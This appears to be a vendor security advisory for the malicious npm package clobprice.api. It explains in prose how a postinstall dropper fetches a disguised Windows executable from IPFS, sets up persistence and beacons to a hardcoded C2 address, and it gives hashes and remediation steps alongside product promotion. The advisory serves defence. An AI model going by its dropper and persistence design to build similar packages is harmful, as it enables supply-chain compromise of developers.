Which versions of clobprice.api are malicious?

The following npm versions of clobprice.api are flagged malicious: 2.73.0, 2.73.1, 2.73.2. Treat any of these as compromised.

How do I remediate clobprice.api if I installed it?

clobprice.api establishes remote access, so treat any host that installed it as fully compromised. Isolate the machine, remove the package, rotate all credentials it could reach, and rebuild from a trusted image rather than cleaning in place — a backdoor may have planted additional persistence.

I already installed clobprice.api — how do I know if it already compromised me?

If clobprice.api was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

Is clobprice.api part of a known attack campaign?

Yes — clobprice.api is associated with the IN-MAL-2026-004764, IN-MAL-2026-004726, IN-MAL-2026-004637 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

How do I find clobprice.api across my projects, lockfiles, and CI pipelines?

Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for clobprice.api (3 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging clobprice.api across your stack and pipelines.

Malicious package

clobprice.apinpm

Malicious code in clobprice.api (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-4350

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall clobprice.api

What this malware does

A campaign of npm packages sharing a common dropper (clob.js) that downloads and persistently installs a Windows executable from IPFS on postinstall. The dropper fetches the binary from IPFS CID bafybeif3zkapj364ofnrvbty7oj5h5ufpxlp4s62usk3ulxrru35e3gssa via multiple public gateways (Pinata, Cloudflare, ipfs.io), drops it to %LOCALAPPDATA%, registers Windows Registry persistence under HKCU\Software\Microsoft\Windows\CurrentVersion\Run using a hidden VBScript wrapper (window style 0, no taskbar entry), launches the payload immediately, and reports the victim's public IP address to a hardcoded C2 server via HTTP POST. macOS and Linux stubs are present but not yet configured. Developer artifacts bundled in config/meta_data.json leak the attacker's build path: E:\getting IP and check list\clob-downloader\.

clobprice.api bundles windows defender host.exe (≈4 MB) directly in the package tarball and also attempts to fetch an identical copy from IPFS at install time. Its postinstall script runs clob.js, which drops the executable to %LOCALAPPDATA%\windows defender host.exe. The C2 beacon transmits the victim's public IP to http://45.8.22.112:2026/api/urls.

package.json declares postinstall: node clob.js and the package's own description states 'Downloads clob2.0.exe on install'. On install, clob.js downloads a Windows PE from anonymous IPFS gateways (violet-tricky-quelea-562.mypinata.cloud, cloudflare-ipfs.com, gateway.pinata.cloud, ipfs.io; CID bafybeif3zkapj364ofnrvbty7oj5h5ufpxlp4s62usk3ulxrru35e3gssa) without any hash or signature verification, writes it to %LOCALAPPDATA% as 'windows defender host.exe' to impersonate a Microsoft component, and silently launches it hidden via a VBS launcher invoked through wscript //nologo with window style 0. A 4,035,072-byte file literally named 'windows defender host.exe' (sha256 300a7dea05c2a588757010ad314fa55cb8ef3acebaa284f58a5cd0fd39bce478) is also bundled in the tarball root as a fallback payload. Persistence is established on every supported platform: Windows registers the launcher under HKCU\Software\Microsoft\Windows\CurrentVersion\Run as 'clob'; macOS loads ~/Library/LaunchAgents/com.clob.agent.plist via launchctl; Linux writes ~/.config/autostart/clob.desktop. After dropping the binary, the script resolves the installer's public IP via api.ipify.org and POSTs it over plain HTTP to the hardcoded bare IP 45.8.22.112:2026 at /api/urls?url=<ip>:80, performing victim check-in to the operator. The result is full, persistent host compromise of any machine that runs npm install clobprice.api.

Malicious versions

3 flagged

2.73.02.73.12.73.2

Indicators of compromise (SHA-256)

576b0aea0f4f7f851d560f7247c254d18eee54a6cff513818495e7d2510e46c8

c4ebda12a1fdf81e5621aa5e045e6286238df134c83d896dd177c60abbedf7d0

ed566168c61c4bc4adfe633b1021969a9546e65dcc53b305b68365a868125fcb

Detection & response playbook

Backdoor / remote access

Find it
Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for clobprice.api (3 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging clobprice.api across your stack and pipelines.
If you installed it — respond
clobprice.api establishes remote access, so treat any host that installed it as fully compromised. Isolate the machine, remove the package, rotate all credentials it could reach, and rebuild from a trusted image rather than cleaning in place — a backdoor may have planted additional persistence.
Did it already run?
If clobprice.api was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.
How O3 protects you
O3 blocks clobprice.api before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. clobprice.api on npm has been identified as a malicious package (versions 2.73.0, 2.73.1, 2.73.2 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-004764IN-MAL-2026-004726IN-MAL-2026-004637

References

Credits

Amazon Inspector · finder
SafeDep · finder

Detect & block this

O3 blocks clobprice.api-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the C2 callback and severs the channel.

Malware detection Runtime egress monitoring